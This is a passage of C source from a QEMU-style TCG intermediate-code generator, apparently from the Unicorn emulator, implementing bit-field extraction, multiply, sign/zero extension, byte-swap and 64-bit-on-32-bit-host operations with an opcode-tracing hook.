Canonicalize certain special cases, even if extract is supported. */ if (ofs + len == 32) { tcg_gen_shri_i32(tcg_ctx, ret, arg, 32 - len); return; } if (ofs == 0) { tcg_gen_andi_i32(tcg_ctx, ret, arg, (1u << len) - 1); return; } if (TCG_TARGET_HAS_extract_i32 && TCG_TARGET_extract_i32_valid(ofs, len)) { tcg_gen_op4ii_i32(tcg_ctx, INDEX_op_extract_i32, ret, arg, ofs, len); return; } /* Assume that zero-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 16: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_ext16u_i32(tcg_ctx, ret, arg); tcg_gen_shri_i32(tcg_ctx, ret, ret, ofs); return; } break; case 8: if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_ext8u_i32(tcg_ctx, ret, arg); tcg_gen_shri_i32(tcg_ctx, ret, ret, ofs); return; } break; } /* ??? Ideally we'd know what values are available for immediate AND. Assume that 8 bits are available, plus the special case of 16, so that we get ext8u, ext16u. 
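* For instance, len == 5 at ofs == 3 becomes shri by 3 plus andi with 0x1f * below, whereas the generic tail would use shli by 24 plus shri by 27; * both are two operations, but the small AND immediate is assumed to * encode cheaply.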
*/ switch (len) { case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 16: tcg_gen_shri_i32(tcg_ctx, ret, arg, ofs); tcg_gen_andi_i32(tcg_ctx, ret, ret, (1u << len) - 1); break; default: tcg_gen_shli_i32(tcg_ctx, ret, arg, 32 - len - ofs); tcg_gen_shri_i32(tcg_ctx, ret, ret, 32 - len); break; } } void tcg_gen_sextract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); /* Canonicalize certain special cases, even if extract is supported. */ if (ofs + len == 32) { tcg_gen_sari_i32(tcg_ctx, ret, arg, 32 - len); return; } if (ofs == 0) { switch (len) { case 16: tcg_gen_ext16s_i32(tcg_ctx, ret, arg); return; case 8: tcg_gen_ext8s_i32(tcg_ctx, ret, arg); return; } } if (TCG_TARGET_HAS_sextract_i32 && TCG_TARGET_extract_i32_valid(ofs, len)) { tcg_gen_op4ii_i32(tcg_ctx, INDEX_op_sextract_i32, ret, arg, ofs, len); return; } /* Assume that sign-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 16: if (TCG_TARGET_HAS_ext16s_i32) { tcg_gen_ext16s_i32(tcg_ctx, ret, arg); tcg_gen_sari_i32(tcg_ctx, ret, ret, ofs); return; } break; case 8: if (TCG_TARGET_HAS_ext8s_i32) { tcg_gen_ext8s_i32(tcg_ctx, ret, arg); tcg_gen_sari_i32(tcg_ctx, ret, ret, ofs); return; } break; } switch (len) { case 16: if (TCG_TARGET_HAS_ext16s_i32) { tcg_gen_shri_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext16s_i32(tcg_ctx, ret, ret); return; } break; case 8: if (TCG_TARGET_HAS_ext8s_i32) { tcg_gen_shri_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext8s_i32(tcg_ctx, ret, ret); return; } break; } tcg_gen_shli_i32(tcg_ctx, ret, arg, 32 - len - ofs); tcg_gen_sari_i32(tcg_ctx, ret, ret, 32 - len); } /* * Extract 32-bits from a 64-bit input, ah:al, starting from ofs. * Unlike tcg_gen_extract_i32 above, len is fixed at 32. 
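 * Equivalently: ret = (uint32_t)(((uint64_t)ah << 32 | al) >> ofs).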
*/ void tcg_gen_extract2_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 al, TCGv_i32 ah, unsigned int ofs) { tcg_debug_assert(ofs <= 32); if (ofs == 0) { tcg_gen_mov_i32(tcg_ctx, ret, al); } else if (ofs == 32) { tcg_gen_mov_i32(tcg_ctx, ret, ah); } else if (al == ah) { tcg_gen_rotri_i32(tcg_ctx, ret, al, ofs); } else if (TCG_TARGET_HAS_extract2_i32) { tcg_gen_op4i_i32(tcg_ctx, INDEX_op_extract2_i32, ret, al, ah, ofs); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shri_i32(tcg_ctx, t0, al, ofs); tcg_gen_deposit_i32(tcg_ctx, ret, t0, ah, 32 - ofs, ofs); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_movcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 c1, TCGv_i32 c2, TCGv_i32 v1, TCGv_i32 v2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_mov_i32(tcg_ctx, ret, v1); } else if (cond == TCG_COND_NEVER) { tcg_gen_mov_i32(tcg_ctx, ret, v2); } else if (TCG_TARGET_HAS_movcond_i32) { tcg_gen_op6i_i32(tcg_ctx, INDEX_op_movcond_i32, ret, c1, c2, v1, v2, cond); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, cond, t0, c1, c2); tcg_gen_neg_i32(tcg_ctx, t0, t0); tcg_gen_and_i32(tcg_ctx, t1, v1, t0); tcg_gen_andc_i32(tcg_ctx, ret, v2, t0); tcg_gen_or_i32(tcg_ctx, ret, ret, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_add2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) { if (TCG_TARGET_HAS_add2_i32) { tcg_gen_op6_i32(tcg_ctx, INDEX_op_add2_i32, rl, rh, al, ah, bl, bh); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, t0, al, ah); tcg_gen_concat_i32_i64(tcg_ctx, t1, bl, bh); tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_sub2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 al, TCGv_i32 ah, TCGv_i32 bl, TCGv_i32 bh) { uc_engine *uc = tcg_ctx->uc; if (TCG_TARGET_HAS_sub2_i32) { if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, tcg_ctx->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && hook->op_flags == 0) { // Calling tcg_gen_sub_i64 will cause infinite recursion. 
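                    // (On 32-bit hosts tcg_gen_sub_i64 is itself built on
                    // sub2_i32, so the i64 temporaries below exist purely to
                    // feed gen_uc_traceopcode.)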
TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, t0, al, ah); tcg_gen_concat_i32_i64(tcg_ctx, t1, bl, bh); gen_uc_traceopcode(tcg_ctx, hook, t0, t1, 32, uc, tcg_ctx->pc_start); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } } tcg_gen_op6_i32(tcg_ctx, INDEX_op_sub2_i32, rl, rh, al, ah, bl, bh); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, t0, al, ah); tcg_gen_concat_i32_i64(tcg_ctx, t1, bl, bh); tcg_gen_sub_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_mulu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_mulu2_i32) { tcg_gen_op4_i32(tcg_ctx, INDEX_op_mulu2_i32, rl, rh, arg1, arg2); } else if (TCG_TARGET_HAS_muluh_i32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_mul_i32, t, arg1, arg2); tcg_gen_op3_i32(tcg_ctx, INDEX_op_muluh_i32, rh, arg1, arg2); tcg_gen_mov_i32(tcg_ctx, rl, t); tcg_temp_free_i32(tcg_ctx, t); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t0, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_muls2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_muls2_i32) { tcg_gen_op4_i32(tcg_ctx, INDEX_op_muls2_i32, rl, rh, arg1, arg2); } else if (TCG_TARGET_HAS_mulsh_i32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_mul_i32, t, arg1, arg2); tcg_gen_op3_i32(tcg_ctx, INDEX_op_mulsh_i32, rh, arg1, arg2); tcg_gen_mov_i32(tcg_ctx, rl, t); tcg_temp_free_i32(tcg_ctx, t); } else if (TCG_TARGET_REG_BITS == 32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mulu2_i32(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative inputs. */ tcg_gen_sari_i32(tcg_ctx, t2, arg1, 31); tcg_gen_sari_i32(tcg_ctx, t3, arg2, 31); tcg_gen_and_i32(tcg_ctx, t2, t2, arg2); tcg_gen_and_i32(tcg_ctx, t3, t3, arg1); tcg_gen_sub_i32(tcg_ctx, rh, t1, t2); tcg_gen_sub_i32(tcg_ctx, rh, rh, t3); tcg_gen_mov_i32(tcg_ctx, rl, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, arg1); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_mulsu2_i32(TCGContext *tcg_ctx, TCGv_i32 rl, TCGv_i32 rh, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_REG_BITS == 32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mulu2_i32(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative input for the signed arg1. 
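   When arg1 is negative, the unsigned product overstates the signed one
   by 2**32 * arg2, so arg2 is masked with arg1's sign and subtracted
   from the high half below.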
*/ tcg_gen_sari_i32(tcg_ctx, t2, arg1, 31); tcg_gen_and_i32(tcg_ctx, t2, t2, arg2); tcg_gen_sub_i32(tcg_ctx, rh, t1, t2); tcg_gen_mov_i32(tcg_ctx, rl, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } } void tcg_gen_ext8s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext8s_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext8s_i32, ret, arg); } else { tcg_gen_shli_i32(tcg_ctx, ret, arg, 24); tcg_gen_sari_i32(tcg_ctx, ret, ret, 24); } } void tcg_gen_ext16s_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext16s_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext16s_i32, ret, arg); } else { tcg_gen_shli_i32(tcg_ctx, ret, arg, 16); tcg_gen_sari_i32(tcg_ctx, ret, ret, 16); } } void tcg_gen_ext8u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext8u_i32, ret, arg); } else { tcg_gen_andi_i32(tcg_ctx, ret, arg, 0xffu); } } void tcg_gen_ext16u_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext16u_i32, ret, arg); } else { tcg_gen_andi_i32(tcg_ctx, ret, arg, 0xffffu); } } /* Note: we assume the two high bytes are set to zero */ void tcg_gen_bswap16_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_bswap16_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_bswap16_i32, ret, arg); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext8u_i32(tcg_ctx, t0, arg); tcg_gen_shli_i32(tcg_ctx, t0, t0, 8); tcg_gen_shri_i32(tcg_ctx, ret, arg, 8); tcg_gen_or_i32(tcg_ctx, ret, ret, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_bswap32_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_bswap32_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_bswap32_i32, ret, arg); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, 0x00ff00ff); /* arg = abcd */ tcg_gen_shri_i32(tcg_ctx, t0, arg, 8); /* t0 = .abc */ tcg_gen_and_i32(tcg_ctx, t1, arg, t2); /* t1 = .b.d */ tcg_gen_and_i32(tcg_ctx, t0, t0, t2); /* t0 = .a.c */ tcg_gen_shli_i32(tcg_ctx, t1, t1, 8); /* t1 = b.d. */ tcg_gen_or_i32(tcg_ctx, ret, t0, t1); /* ret = badc */ tcg_gen_shri_i32(tcg_ctx, t0, ret, 16); /* t0 = ..ba */ tcg_gen_shli_i32(tcg_ctx, t1, ret, 16); /* t1 = dc.. 
*/ tcg_gen_or_i32(tcg_ctx, ret, t0, t1); /* ret = dcba */ tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } } void tcg_gen_smin_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, ret, a, b, a, b); } void tcg_gen_umin_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, ret, a, b, a, b); } void tcg_gen_smax_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, ret, a, b, b, a); } void tcg_gen_umax_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a, TCGv_i32 b) { tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LTU, ret, a, b, b, a); } void tcg_gen_abs_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 a) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t, a, 31); tcg_gen_xor_i32(tcg_ctx, ret, a, t); tcg_gen_sub_i32(tcg_ctx, ret, ret, t); tcg_temp_free_i32(tcg_ctx, t); } /* 64-bit ops */ #if TCG_TARGET_REG_BITS == 32 /* These are all inline for TCG_TARGET_REG_BITS == 64. */ void tcg_gen_discard_i64(TCGContext *tcg_ctx, TCGv_i64 arg) { tcg_gen_discard_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg)); tcg_gen_discard_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, arg)); } void tcg_gen_mov_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg)); } void tcg_gen_movi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg) { tcg_gen_movi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), arg >> 32); } void tcg_gen_ld8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld8u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } void tcg_gen_ld8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld8s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); } void tcg_gen_ld16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld16u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } void tcg_gen_ld16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld16s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); } void tcg_gen_ld32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); } void tcg_gen_ld32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); } void tcg_gen_ld_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { /* Since arg2 and ret have different types, they cannot be the same temporary */ #ifdef HOST_WORDS_BIGENDIAN tcg_gen_ld_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), arg2, offset); tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset + 4); #else tcg_gen_ld_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg2, offset); tcg_gen_ld_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), arg2, offset 
+ 4);
#endif
}

void tcg_gen_st_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2,
                    tcg_target_long offset)
{
#ifdef HOST_WORDS_BIGENDIAN
    tcg_gen_st_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, arg1), arg2, offset);
    tcg_gen_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset + 4);
#else
    tcg_gen_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset);
    tcg_gen_st_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, arg1), arg2, offset + 4);
#endif
}

void tcg_gen_and_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                     TCGv_i64 arg2)
{
    tcg_gen_and_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1),
                    TCGV_LOW(tcg_ctx, arg2));
    tcg_gen_and_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1),
                    TCGV_HIGH(tcg_ctx, arg2));
}

void tcg_gen_or_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                    TCGv_i64 arg2)
{
    tcg_gen_or_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1),
                   TCGV_LOW(tcg_ctx, arg2));
    tcg_gen_or_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1),
                   TCGV_HIGH(tcg_ctx, arg2));
}

void tcg_gen_xor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                     TCGv_i64 arg2)
{
    tcg_gen_xor_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1),
                    TCGV_LOW(tcg_ctx, arg2));
    tcg_gen_xor_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1),
                    TCGV_HIGH(tcg_ctx, arg2));
}

void tcg_gen_shl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                     TCGv_i64 arg2)
{
    gen_helper_shl_i64(tcg_ctx, ret, arg1, arg2);
}

void tcg_gen_shr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                     TCGv_i64 arg2)
{
    gen_helper_shr_i64(tcg_ctx, ret, arg1, arg2);
}

void tcg_gen_sar_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                     TCGv_i64 arg2)
{
    gen_helper_sar_i64(tcg_ctx, ret, arg1, arg2);
}

void tcg_gen_mul_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                     TCGv_i64 arg2)
{
    TCGv_i64 t0;
    TCGv_i32 t1;

    t0 = tcg_temp_new_i64(tcg_ctx);
    t1 = tcg_temp_new_i32(tcg_ctx);

    tcg_gen_mulu2_i32(tcg_ctx, TCGV_LOW(tcg_ctx, t0), TCGV_HIGH(tcg_ctx, t0),
                      TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2));

    tcg_gen_mul_i32(tcg_ctx, t1, TCGV_LOW(tcg_ctx, arg1),
                    TCGV_HIGH(tcg_ctx, arg2));
    tcg_gen_add_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, t0), TCGV_HIGH(tcg_ctx, t0), t1);
    tcg_gen_mul_i32(tcg_ctx, t1, TCGV_HIGH(tcg_ctx, arg1),
                    TCGV_LOW(tcg_ctx, arg2));
    tcg_gen_add_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, t0), TCGV_HIGH(tcg_ctx, t0), t1);

    tcg_gen_mov_i64(tcg_ctx, ret, t0);
    tcg_temp_free_i64(tcg_ctx, t0);
    tcg_temp_free_i32(tcg_ctx, t1);
}
#endif /* TCG_TARGET_REG_BITS == 32 */

void tcg_gen_addi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1,
                      int64_t arg2)
{
    /* some cases can be optimized here */
    if (arg2 == 0) {
        tcg_gen_mov_i64(tcg_ctx, ret, arg1);
    } else {
        TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2);
        tcg_gen_add_i64(tcg_ctx, ret, arg1, t0);
        tcg_temp_free_i64(tcg_ctx, t0);
    }
}

void tcg_gen_subfi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg1,
                       TCGv_i64 arg2)
{
    if (arg1 == 0 && TCG_TARGET_HAS_neg_i64) {
        /* Don't recurse with tcg_gen_neg_i64.
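           When the host lacks a neg op, tcg_gen_neg_i64 is itself
           implemented as subfi_i64(ret, 0, arg), so emit the raw opcode
           directly here.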
*/ tcg_gen_op2_i64(tcg_ctx, INDEX_op_neg_i64, ret, arg2); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg1); tcg_gen_sub_i64(tcg_ctx, ret, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_subi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_sub_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_andi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_andi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), arg2); tcg_gen_andi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), arg2 >> 32); return; #else TCGv_i64 t0; /* Some cases can be optimized here. */ switch (arg2) { case 0: tcg_gen_movi_i64(tcg_ctx, ret, 0); return; case -1: tcg_gen_mov_i64(tcg_ctx, ret, arg1); return; case 0xff: /* Don't recurse with tcg_gen_ext8u_i64. */ if (TCG_TARGET_HAS_ext8u_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext8u_i64, ret, arg1); return; } break; case 0xffff: if (TCG_TARGET_HAS_ext16u_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext16u_i64, ret, arg1); return; } break; case 0xffffffffu: if (TCG_TARGET_HAS_ext32u_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext32u_i64, ret, arg1); return; } break; } t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_and_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_ori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ori_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), arg2); tcg_gen_ori_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), arg2 >> 32); return; #else /* Some cases can be optimized here. */ if (arg2 == -1) { tcg_gen_movi_i64(tcg_ctx, ret, -1); } else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_or_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_xori_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_xori_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), arg2); tcg_gen_xori_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), arg2 >> 32); return; #else /* Some cases can be optimized here. */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else if (arg2 == -1 && TCG_TARGET_HAS_not_i64) { /* Don't recurse with tcg_gen_not_i64. 
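           Without a host not op, tcg_gen_not_i64 (below) is implemented
           as xori_i64(ret, arg, -1), which would land right back here.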
